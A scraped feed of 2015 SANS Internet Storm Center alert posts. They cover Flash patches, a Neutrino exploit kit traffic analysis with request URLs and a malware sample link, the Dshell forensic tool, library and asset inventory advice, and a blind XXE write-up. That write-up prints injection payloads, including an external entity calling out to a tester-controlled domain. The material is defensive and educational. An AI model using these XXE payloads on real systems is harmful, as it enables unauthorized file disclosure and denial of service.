Alerts

Adobe Flash Player Update Released, Fixing CVE 2015-0313, (Thu, Feb 5th)

Latest Alerts - Wed, 02/04/2015 - 16:16

An update has been released for Adobe Flash that fixes according to Adobe the recently discovered and exploited vulnerability CVE-2015-0313. Currently, the new version of Flash Player is only available as an auto-install update, not as a standalone download. To apply it, you need to check for updates within Adobe flash. (personal note: on my Mac, I have not seen the update offered yet).

The new Flash player version that fixes the problem is 16.0.0.305. The old version is 16.0.0.296.

Adobe updated its bulletin to note the update:https://helpx.adobe.com/security/products/flash-player/apsa15-02.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Exploit Kit Evolution - Neutrino, (Wed, Feb 4th)

Latest Alerts - Wed, 02/04/2015 - 12:32

This is a guest diary submitted by Brad Duncan.

In September 2014 after the Neutrino exploit kit (EK) had disappeared for 6 months, it reappeared in a different form. It was first identified as Job314 or Alter EK before Kafeine revealed in November 2014 this traffic was a reboot of Neutrino [1].

This Storm Center diary examines Neutrino EK traffic patterns since it first appeared in the Spring of 2013.

Neutrino EK: 2013 through early 2014

Neutrino was first reported in March 2013 by Kafeine on his Malware Dont need Coffee blog [2]. It was also reported by other sources, like Trend Micro [3].

Heres a sample of Neutrino EK from April 2013 using HTTP over port 80:

Shown above: Neutrino EK traffic from April 2013.

By the summer of 2013, we saw Neutrino use HTTP over port 8000, and the traffic patterns had evolved. Heres an example from June 2013, back when I first started blogging about malware traffic [4]:

Shown above: Neutrino EK traffic from June 18th, 2013.

In October 2013, Operation Windigo (an on-going operation that has compromised thousands of servers since 2011) switched from using the Blackhole EK to Neutrino [5].

Before Neutrino EK disappeared in March of 2014, I usually found it in traffic associated with Operation Windigo. Here are two examples from February and March 2014 [6] [7]:

Shown above: Neutrino EK traffic from February 2nd, 2014.

Shown above: Neutrino EK traffic from March 8th, 2014.

March 2014 saw some reports about the EKs author selling Neutrino [8]. Later that month, Neutrino disappeared. We stopped seeing any sort of traffic or alerts on this EK.

Neutrino EK since December 2014

After Kafeine made his announcement and EmergingThreats released new signatures for this EK, I was able to infect a few VMs. Heres an example from November 2014 [9]:

Shown above: Neutrino EK traffic from November 29th, 2014.

Traffic patterns have remained relatively consistent since Neutrino reappeared. I infected a VM on February 2nd, 2015 using this EK. Below are the HTTP requests and responses to Neutrino EK on vupwmy.dout2.eu:12998.

  • GET /hall/79249/card/81326/aspect/sport/clear/16750/mercy/flash/clutch/1760/
    absorb/43160/conversation/universal/
  • HTTP/1.1 200 OK (text/html) - Landing page
  • GET /choice/34831/mighty/drift/hopeful/19742/fantastic/petunia/fine/12676/
    background/76767/seal/74018/street/20328/
  • HTTP/1.1 200 OK (application/x-shockwave-flash) - Flash exploit
  • GET /nowhere/44312/clad/29915/bewilder/career/pass/sinister/
  • HTTP/1.1 200 OK (text/html) - No actual text, about 25 to 30 bytes of data, shows up as Malformed Packet in Wireshark.
  • GET /marble/1931/batter/21963/dear/735/yesterday/6936/familiar/37370/
  • smart/8962/move/37885/
  • HTTP/1.1 200 OK (application/octet-stream) - Encrypted malware payload
  • GET /lord.phtml?horror=64439push=75359pursuit=washfond=monsieur
    wooden=forevercontent=21179despite=libertystalk=shiverfaithful=10081
    bold=35942
  • HTTP/1.1 404 Not Found OK (text/html)
  • GET /america/86960/seven/quiet/blur/belong/traveller/12743/gigantic/96057/
    trunk/69375/await/30077/cunning/39832/betray/638/
  • HTTP/1.1 404 Not Found OK (text/html)

The malware payload sent by the EK is encrypted.

Shown above: Neutrino EK sends the malware payload.

I extracted the malware payload from the infected VM. If youre registered with Malwr.com, you can get a copy from:

https://malwr.com/analysis/NjFjNjQyYjBkMzVhNGE4MWE4Mjc1Mzk2NmQxNjFjM2E/

This malware is similar to previous Vawtrak samples Ive seen from Neutrino and Nuclear EK last month [10] [11].

Closing Thoughts

Exploit kits tend to evolve over time. You might not realize how much the EK has changed until you look back through the traffic. Neutrino EK is no exception. It evolved since it first appeared in 2013, and it significantly changed after reappearing in December 2014. It will continue to evolve, and many of us will continue to track those changes.

----------

Brad Duncan is a Security Researcher at Rackspace, and he runs a blog on malware traffic analysis at http://www.malware-traffic-analysis.net

References:

[1] http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

[2] http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

[3] http://blog.trendmicro.com/trendlabs-security-intelligence/a-new-exploit-kit-in-neutrino/

[4] http://malware-traffic-analysis.net/2013/06/18/index.html

[5] http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf

[6] http://malware-traffic-analysis.net/2014/02/02/index.html

[7] http://malware-traffic-analysis.net/2014/03/08/index.html

[8] http://news.softpedia.com/news/Neutrino-Exploit-Kit-Reportedly-Put-Up-for-Sale-by-Its-Author-430253.shtml

[9] http://www.malware-traffic-analysis.net/2014/12/01/index.html

[10] http://malware-traffic-analysis.net/2015/01/26/index.html

[11] http://www.malware-traffic-analysis.net/2015/01/29/index.html

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

February OUCH! Newsletter - Staying Secure on the Road: http://www.securingthehuman.org/ouch, (Wed, Feb 4th)

Latest Alerts - Wed, 02/04/2015 - 07:48
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, February 4th 2015 http://isc.sans.edu/podcastdetail.html?id=4341, (Wed, Feb 4th)

Latest Alerts - Tue, 02/03/2015 - 16:21
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Another Network Forensic Tool for the Toolbox - Dshell, (Tue, Feb 3rd)

Latest Alerts - Tue, 02/03/2015 - 10:59

This is a guest diary written byMr. William Glodek Chief, Network Security Branch, U.S. Army Research Laboratory

As a network analysis practitioner, I analyze multiple gigabytes of pcap data across multiple files on a daily basis. I have encountered many challenges where the standard tools (tcpdump, tcpflow, Wireshark/tshark) were either not flexible enough or couldnt be prototyped quickly enough to do specialized analyzes in a timely manner. Either the analysis couldnt be done without recompiling the tool itself, or the plugin system was difficult to work with via command line tools.

Dshell, a Python-based network forensic analysis framework developed by the U.S. Army Research Laboratory, can help make that job a little easier [1]. The framework handles stream reassembly of both IPv4 and IPv6 network traffic and also includes geolocation and IP-to-ASN mapping data for each connection. The framework also enables development of network analysis plug-ins that are designed to aid in the understanding of network traffic and present results to the user in a concise, useful manner by allowing users to parse and present data of interest from multiple levels of the network stack. from tweaking an existing decoder to extract slightly different information from existing protocols, to writing a new parser for a completely novel protocol. Here are two scenarios where Dshell has decreased the time required to identify and respond to network forensic challenges.

  1. Malware authors will frequently embed a domain name in a piece of malware for improved command and control or resiliency to security countermeasures such as IP blocking. When the attackers have completed their objective for the day, they minimize the network activity of the malware by updating the DNS record for the hostile domain to point to a non-Internet routable IP address (ex. 127.0.0.1).">Dshell decode d reservedips *.pcap

    The reservedips module will find all of the DNS request/response pairs for domains that resolve to a non-routable IP address, and display them on a single line. By having each result displayed on a single line, I can utilize other command line utilities like awk or grep to further filter the results. Dshell can also present the output in CSV format, which may be imported into many Security Event and Incident Management (SEIM) tools or other analytic platforms.

    1. A drive-by-download attack is successful and a malicious executable is downloaded [2]. I need to find the network flow of the download of the malicious executable and extract the executable from the network traffic.
      Using the web module, I can inspect all the web traffic contained in the sample file. In the example below, a request for xzz1.exe with a successful server response is likely the malicious file.

    I can then extract the executable from the network traffic by using the rip-http module. The rip-http module will reassemble the IP/TCP/HTTP stream, identify the filename being requested, strip the HTTP headers, and write the data to disk with the appropriate filename.

    There are additional modules within the Dshell framework to solve other challenges faced with network forensics. The ability to rapidly develop and share analytical modules is a core strength of Dshell. If you are interested in using or contributing to Dshell, please visit the project at https://github.com/USArmyResearchLab/Dshell.

    [1] Dshell https://github.com/USArmyResearchLab/Dshell
    [2] http://malware-traffic-analysis.net/2015/01/03/index.html

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

What is using this library?, (Tue, Feb 3rd)

Latest Alerts - Tue, 02/03/2015 - 08:54

Last year with OpenSSL, and this year with the GHOST glibc vulnerability, the question came up about what piece of software is using what specific library. This is a particular challenging inventory problem. Most software does not document well all of its dependencies. Libraries can be statically compiled into a binary, or they can be loaded dynamically. In addition, updating a library on disk may not always be sufficient if a particular piece of software does ues a library that is already loaded in memory.

To solve the first problem, there is ldd. ldd will tell you what libraries will be loaded by a particular piece of software. For example:

$ ldd /bin/bash
linux-vdso.so.1 = (0x00007fff9677e000)
libtinfo.so.5 = /lib64/libtinfo.so.5 (0x00007fa397b43000)
libdl.so.2 = /lib64/libdl.so.2 (0x00007fa39793f000)
libc.so.6 = /lib64/libc.so.6 (0x00007fa3975aa000)
/lib64/ld-linux-x86-64.so.2 (0x00007fa397d72000)

The first line (linux-vdso) doesnt point to an actual library, but to the Virtual Dynamic Shared Object which represents kernel routines. Whenever you see an arrow (=), it indicates that there is a symlinkto a specific library that is being used.Another option that works quite well for shared libraries is readelf. e.g. readelf -d /bin/bash will list

To list libraries currently loaded, and programs that are using them, you can use lsof.

One trick with lsof is that it may appreviate command names to make the output look better. To fix this, use the +c 0">#lsof +c 0 | grep libc-
init 1 root mem REG 253,0 1726296 131285 /lib64/libc-2.5.so
udevd 836 root mem REG 253,0 131078 /lib64/libc-2.5.so (path inode=131285)
anvil 987 postfix mem REG 253,0 1726296 131285 /lib64/libc-2.5.so

The first column will tell you what processes need restarting. Also the number in front of the library (131285) is the inodefor the library file. As you may note above, the inode is different for some of these libraries, indicating that the library changed. These are the processes that need restarting.

It is always best to reboot a system to not have to worry about remnant bad code staying in memory.

In addition, if your system uses RPMs, you can find dependencies using the RPM. But this information is not always complete.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, February 3rd 2015 http://isc.sans.edu/podcastdetail.html?id=4339, (Tue, Feb 3rd)

Latest Alerts - Mon, 02/02/2015 - 16:39
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Friday Special Webcast: Lessons Learned from "Ghost" https://www.sans.org/webcasts/wrapping-ghost-lessons-learned-ghost-vulnerability-99642, (Mon, Feb 2nd)

Latest Alerts - Mon, 02/02/2015 - 07:49

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

New Adobe Flash Vulnerability - CVE-2015-0313, (Mon, Feb 2nd)

Latest Alerts - Mon, 02/02/2015 - 07:12

For those of you who are loosing track, yet another Adobe Flash vulnerability has been unleashedon their unsuspecting users. I am sure we all know the wording off by heart now, but incase:

Vulnerability identifier: APSA15-02

CVE number : CVE-2015-0313

Platform: All Platforms

Quote: A critical vulnerability (CVE-2015-0313) exists inAdobe Flash Player 16.0.0.296and earlier versions for Windows and Macintosh. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. ">1.">2." target="_blank">http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/

Steve Hall ISC Handler www.tarkie.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Monday, February 2nd 2015 http://isc.sans.edu/podcastdetail.html?id=4337, (Mon, Feb 2nd)

Latest Alerts - Sun, 02/01/2015 - 20:21
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Asset Inventory: Do you have yours?, (Sun, Feb 1st)

Latest Alerts - Sun, 02/01/2015 - 16:01

The year is hardly a month old and we have people racing around as if their hair is on fire, demanding to know if the GLibc vulnerability CVE-2015-0235 (aka GHOST) [1] affects them. Its a reasonable certainty that this wont be the only time this year someone will be hammering on your door* wanting answers. And they want them now.

Its a fair question, given the impact certain vulnerabilities can have, but seemingly a large percentage of businesses cant immediately answer this. This is the part that doesnt make much sense. Knowing what software you have and which system it inhabits should be a basic business requirement, which is supported by IT[2]. Whether it be in a fancy cloud-based database or a simple spreadsheet (CSV format even) this information should be up to date and easily accessible. shouldnt someone in the IT team/group/department/dark room in the basement know this already? Why are they asking the security team? Odd, isnt it, when a problem pops today and its something to do with security, the expectation is that the security team should know the answer? Perhaps that a simple testament to how good you are getting answers, or, more likely youre the most logical person to ask. (Well, it is an IT security problem, that nice media story/article/tweet has said so...). It becomes pretty easy to do the wrong thing here and play politics here by pointing fingers and blaming someone else. So how to avoid get in this mess in the first place?

An up to date and complete asset list is worth its weight in gold for numerous folk with in a company, so if the nice people in Audit and Compliance are maintaining it, its time to make new friends. If one doesnt exist, then go meet with the people that can help create one and show them the value of doing this. You have to show the value to them and understand their perspective as this can be a lot of work to keep current. Getting others to build and maintain the asset inventory because they see value and actual use in it avoids the Because my boss is making me do it loathing issue. Anytime someone fails to understand or realise the value of an asset inventory, it then becomes the last thing on a very long to do list. This means it never gets properly completed or updated, and were back to the same problem again.

Socializing security requirements is about building a community of people that understand and ultimately care about being part of a more secure working environment. Its about talking to your workmates and explaining helping you out with something as simple as an asset inventory, can be good for the whole company. And whats good for the company, is good for them.

So the next time someone bursts through your door, wide eyed and panting over todays wittily titled vulnerability, youll be able to give them the definitive answer. Then you can drop in this wouldnt be possible without the help of and give those other folks their due credit too.

The basics for an asset inventory lists are straight forward, it needs: what is it, where is it, who owns it and whats on it. This will get answer most of the basic questions or provide a starting point to initiate more in-depth and complex questions with the right system owners. Basic asset inventories wont give you the answer to how many systems are vulnerable to something like CVE-2015-0235, but it will show how many systems, and which systems, are potentially vulnerable. Thats a much better place to be.

Basic requirements of an asset Inventory data fields:

  • Make of the device
  • Model of the device
  • Serial Number of the device
  • Assigned asset tag number
  • System Name (assigned host name)
  • System Owner (who is responsible for the asset, both business and technical contacts)
  • Physical Location
  • Operating System
  • OS version level
  • Function (apps web server
  • Network location (e.g. internal workstation LAN, DMZ, Protected Internal network, etc.)
  • Business criticality (e.g. Low, Medium, High, Critical)">If you have any other suggestions or advice on getting a decent asset inventory in place and updated, please feel free to add a comment.

    For the Australian Readers - Support your local Con-">CrikeyCon is back!

    CrikeyConis on the Saturday,21stFebruary and held inBrisbane, Australia. For more details go to http://crikeycon.com

    ">Chris">--- Internet Storm Center Handler on Duty

    [1] Critical GLibc Vulnerability CVE-2015-0235 (aka GHOST)
    [2] And is on most of the critical controls list, including: https://www.sans.org/critical-security-controls/control/2
    * Real or virtual (email, IM, fax or telegram now seem to be doorways too)

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Asset Inventory: Do you have yours?, (Sun, Feb 1st)

Latest Alerts - Sun, 02/01/2015 - 16:01

The year is hardly a month old and we have people racing around as if their hair is on fire, demanding to know if the GLibc vulnerability CVE-2015-0235 (aka GHOST) [1] affects them. Its a reasonable certainty that this wont be the only time this year someone will be hammering on your door* wanting answers. And they want them now.

Its a fair question, given the impact certain vulnerabilities can have, but seemingly a large percentage of businesses cant immediately answer this. This is the part that doesnt make much sense. Knowing what software you have and which system it inhabits should be a basic business requirement, which is supported by IT[2]. Whether it be in a fancy cloud-based database or a simple spreadsheet (CSV format even) this information should be up to date and easily accessible. shouldnt someone in the IT team/group/department/dark room in the basement know this already? Why are they asking the security team? Odd, isnt it, when a problem pops today and its something to do with security, the expectation is that the security team should know the answer? Perhaps that a simple testament to how good you are getting answers, or, more likely youre the most logical person to ask. (Well, it is an IT security problem, that nice media story/article/tweet has said so...). It becomes pretty easy to do the wrong thing here and play politics here by pointing fingers and blaming someone else. So how to avoid get in this mess in the first place?

An up to date and complete asset list is worth its weight in gold for numerous folk with in a company, so if the nice people in Audit and Compliance are maintaining it, its time to make new friends. If one doesnt exist, then go meet with the people that can help create one and show them the value of doing this. You have to show the value to them and understand their perspective as this can be a lot of work to keep current. Getting others to build and maintain the asset inventory because they see value and actual use in it avoids the Because my boss is making me do it loathing issue. Anytime someone fails to understand or realise the value of an asset inventory, it then becomes the last thing on a very long to do list. This means it never gets properly completed or updated, and were back to the same problem again.

Socializing security requirements is about building a community of people that understand and ultimately care about being part of a more secure working environment. Its about talking to your workmates and explaining helping you out with something as simple as an asset inventory, can be good for the whole company. And whats good for the company, is good for them.

So the next time someone bursts through your door, wide eyed and panting over todays wittily titled vulnerability, youll be able to give them the definitive answer. Then you can drop in this wouldnt be possible without the help of and give those other folks their due credit too.

The basics for an asset inventory lists are straight forward, it needs: what is it, where is it, who owns it and whats on it. This will get answer most of the basic questions or provide a starting point to initiate more in-depth and complex questions with the right system owners. Basic asset inventories wont give you the answer to how many systems are vulnerable to something like CVE-2015-0235, but it will show how many systems, and which systems, are potentially vulnerable. Thats a much better place to be.

Basic requirements of an asset Inventory data fields:

  • Make of the device
  • Model of the device
  • Serial Number of the device
  • Assigned asset tag number
  • System Name (assigned host name)
  • System Owner (who is responsible for the asset, both business and technical contacts)
  • Physical Location
  • Operating System
  • OS version level
  • Function (apps web server
  • Network location (e.g. internal workstation LAN, DMZ, Protected Internal network, etc.)
  • Business criticality (e.g. Low, Medium, High, Critical)">If you have any other suggestions or advice on getting a decent asset inventory in place and updated, please feel free to add a comment.

    For the Australian Readers - Support your local Con-">CrikeyCon is back!

    CrikeyConis on the Saturday,21stFebruary and held inBrisbane, Australia. For more details go to http://crikeycon.com

    ">Chris">--- Internet Storm Center Handler on Duty

    [1] Critical GLibc Vulnerability CVE-2015-0235 (aka GHOST)
    [2] And is on most of the critical controls list, including: https://www.sans.org/critical-security-controls/control/2
    * Real or virtual (email, IM, fax or telegram now seem to be doorways too)

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Improving SSL Warnings, (Sun, Feb 1st)

Latest Alerts - Sun, 02/01/2015 - 08:44

One of the things that has concerned mefor the last few years is how we are slowly creating a click-thru culture. " />

I honestly believe the intent is correct, but the implementation is faulty. The messages are not in tune with the average Internet users knowledge level. In other words the warningsare incomprehensible to my sister, my parents and my grandparents, the average Internet users of today. Given a choice between going to their favorite website or trusting an incomprehensible warning message...well you know what happens next.

A team at Google has been looking at these issues and are driving browser changes in Chrome base on their research. As they point out the vast majority of these errors are attributable to webmaster mistakes with only a very small fraction being actual attacks.

The paper, is Improving SSL Warnings: Comprehension and Adherence, and there is an accompanying presentation.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Beware of Phishing and Spam Super Bowl Fans!, (Sat, Jan 31st)

Latest Alerts - Fri, 01/30/2015 - 20:43

Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday and the spam and phishing emails are pouring in complete with helpful links - back-ended by malware and/or credential harvesting of course.

Its worth a reminder friends and family if they see any emails about the Super Bowl that appears to be too good to be true to simply delete it. Be safe!


[1] http://www.google.com/safebrowsing/diagnostic?site=http://www.yoursuperbowlspace.com/torn/pigmentations/containments/papal/seen/bons.htm

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, January 30th 2015 http://isc.sans.edu/podcastdetail.html?id=4335, (Fri, Jan 30th)

Latest Alerts - Thu, 01/29/2015 - 20:05
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Blindly confirming XXE, (Thu, Jan 29th)

Latest Alerts - Thu, 01/29/2015 - 10:43

Almost exactly a year ago I posted a diary called Is XXE the new SQLi? you can read it at https://isc.sans.edu/diary/Is+XXE+the+new+SQLi/17375. In last year, the things have not changed a lot regarding XXE vulnerabilities. They still seem to be popping up here and there, depending on how XML documents are consumed by server side applications.

Recently I had an interesting engagement where the server side web application consumed an XML document submitted by a user (through a web browser, in a POST HTTP request). Of course, whenever you see XML being used, you should always test for existence of XXE vulnerabilities since their impact can be quite serious check the original diary and can lead from Denial of Service attacks to disclosure of arbitrary files.

In this specific case, however, the problem was that while the application processed the submitted XML document, it never outputted anything from the document: the application would only echo back if processing was successful or not.

So the question that came in mind was on how to confirm if the target application was vulnerable to XXE or not? Sure, I could try to launch a DoS attack to see if it works or not, but since I was dealing with a semi-production system, this was not an option.

Almost like blind SQL injection

This case is very similar to blind SQL injection vulnerabilities: we can modify the input and while we cannot see the output directly, we can deduce what happened on the server side. Let">DocumentLayer
Document InternalID=1
DocumentPointerTest/DocumentPointer
/Document
/DocumentLayer

Of course, in the real test the XML document was much more complex and had some logic for the backend application ">DocumentPointer">!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe Test ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

Simple! If this works, it means that we blindly confirmed that the XML processor on the server side used our reference to the xxe entity. Cool.
The next step is to see if we can use external entities. However, again, since we cannot see the results of the XXE injection, its not all that simple. To make things more complex, the backend server is behind a firewall that does not let this machine connect directly to anything on the Internet. This stops us from using a SYSTEM external entity with a URL supplied.

So is there any other way to confirm that external entities are supported? Probably yes there is one protocol that is almost always allowed, in one sense or another: DNS. In this particular case, this means that we can craft external entity which will resolve to a domain name that we control by checking DNS requests we can see if the entity was resolved correctly or not. In this case it does not matter if the backend server cannot access the Internet or not ">!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe SYSTEM http://thisdomaindoesnotexist.infigo.hr/test.txt ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

While this document will not be processed correctly (remember, the DocumentPointer element must contain the text string Test), the reference will be resolved by the XML processor and by observing the DNS traffic on DNS servers for our domain we will see a request for the submitted domain which will allow us to confirm that XXEs are resolved by the target application.

So, to wrap things up we blindly confirmed the XXE vulnerability in the target application. While in this case our exploitation options are unfortunately limited only to DoS, it is worth noting that the vulnerability exists, and that its only a matter of time when it can be abused further, unless patched.

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, January 29th 2015 http://isc.sans.edu/podcastdetail.html?id=4333, (Thu, Jan 29th)

Latest Alerts - Wed, 01/28/2015 - 19:34
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe Flash Update Available for CVE-2015-0311 & -0312, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 12:23

Adobe has released an update to the Flash vulnerability CVE-2015-0311 discussed earlier this week here on the ISC. The update released from Adobe addresses Flash vulnerabilities documented in CVE-2015-0311 CVE-2015-0312, which now has exploits being seen in the wild. Given that we are seeing exploits in the wild, the criticality of this exploit should be re-evaluated for prioritization and implementation. ">tony d0t carothers --gmail

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

GHOST glibc gethostbyname() Vulnerability: https://www.youtube.com/watch?v=218JiCBpUTM, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 08:01
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, January 28th 2015 http://isc.sans.edu/podcastdetail.html?id=4331, (Wed, Jan 28th)

Latest Alerts - Wed, 01/28/2015 - 07:43
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts
Syndicate content